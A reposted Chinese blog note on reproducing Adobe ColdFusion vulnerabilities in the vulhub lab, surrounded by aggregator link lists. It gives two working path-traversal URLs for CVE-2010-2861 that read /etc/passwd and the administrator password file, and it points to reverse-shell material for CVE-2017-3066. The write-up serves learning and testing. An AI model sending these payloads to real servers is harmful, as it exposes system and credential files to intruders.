【vulhub】Adobe ColdFusion 反序列化漏洞（CVE-2017-3066）和CVE-2010-2861文件包含漏洞 - 代码天地

【vulhub】Adobe ColdFusion 反序列化漏洞（CVE-2017-3066）和CVE-2010-2861文件包含漏洞

其他 2021-11-28 13:06:07 阅读次数: 0

adobe coldfusion特征
1、8500端口
2、如图所示
在这里插入图片描述
验证和反弹shell都有
https://idc.wanyunshuju.com/aqld/2076.html

第二个漏洞
CVE-2010-2861文件包含漏洞

直接访问`http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en`，即可读取文件`/etc/passwd`：

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kuloRacE-1631534520188)(1.png)]

读取后台管理员密码`http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en`：

猜你喜欢

转载自blog.csdn.net/qq_45300786/article/details/120269245

【vulhub】Adobe ColdFusion 反序列化漏洞（CVE-2017-3066）和CVE-2010-2861文件包含漏洞

vulhub漏洞复现-Adobe ColdFusion(CVE-2010-2861)任意文件读取

Adobe_ColdFusion文件读取漏洞 CVE-2010-2861 漏洞复现

vulhub学习笔记-Adobe ColdFusion 文件读取漏洞

Adoble ColdFusion反序列化漏洞（CVE-2017-3066）

Adobe ColdFusion 反序列化漏洞复现（CVE-2023-29300）

【漏洞复现-coldfusion-文件读取】vulfocus/coldfusion-cve_2010_2861

Adobe做出修补动作修正遭黑客开采的ColdFusion漏洞

Adobe April安全更新修复了Adobe ColdFusion，Adobe After Effects和Adobe Digital Editions中的多个漏洞

CISA 将Adobe ColdFusion中的这个严重漏洞列入必修清单

[EXP]Adobe ColdFusion 2018 - Arbitrary File Upload

【Vulhub】CVE-2017-7504 JBOSS反序列化漏洞复现

【Vulhub】CVE-2017-12149 JBOSS反序列化漏洞复现

vulhub漏洞复现-Apache Shiro(CVE-2016-4437) 反序列化漏洞复现

【vulhub漏洞复现】CVE-2015-5254 ActiveMQ反序列化漏洞

ColdFusion再爆远程代码执行漏洞 CVE-2018-4939

java-ColdFusion 2018中的iText pdfReader不发布文件

【Vulhub】JBOSS JMXInvokerServlet 反序列化漏洞复现

【vulhub】Couchdb 任意命令执行漏洞（CVE-2017-12636）

ColdFusion软件介绍

Coldfusion的基础知识

ColdFusion 编写WebService 示例

【vulhub】httpoxy漏洞（CVE-2016-5385）

vulhub漏洞复现-Mojarra JSF ViewState 反序列化漏洞

Fastjson反序列化漏洞原理与漏洞复现（基于vulhub，保姆级的详细教程）

Weblogic XMLDecoder 反序列化漏洞原理与漏洞复现（基于vulhub，保姆级的详细教程）

Adobe Reader漏洞，CVE-2010-2883的记录

21 - vulhub - fastjson 反序列化导致任意命令执行漏洞

【vulhub】Apereo CAS 4.1 反序列化命令执行漏洞复现

Vulhub搭建weblogic反序列化漏洞实现内网穿透

今日推荐

Apache Doris 2.0.10 版本正式发布！

开源日报 | 大模型开战；大模型独角兽被曝卖身；周鸿祎建议谷歌开源所有产品；最大开源AI社区提供1000万美元共享GPU

开源日报 | Chrome内置Gemini的意义不在于Gemini；中国AI追随之路的五大误区；ECharts创始人“下海”养鱼；谷歌I/O开发者大会什么都有，只是没有惊喜

微软回应中国区AI团队“打包赴美”传闻

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

周排行

阿里云短信服务平台注册

Windows下的字符串处理(1)

sqoop: mysql导入数据到hdfs, hive, hbase

commons.lang中常用的工具类

离线安装PostgreSQL11.6

使用PyTorch简单实现卷积神经网络模型

一文彻底搞定谱聚类

一道面试题引发的血案

One Chat for Mac(聊天工具)

TCP/IP的底层队列是如何实现的？

每日归档

更多

2024-05-17(34)

2024-05-16(6)

2024-05-15(24)

2024-05-14(0)

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)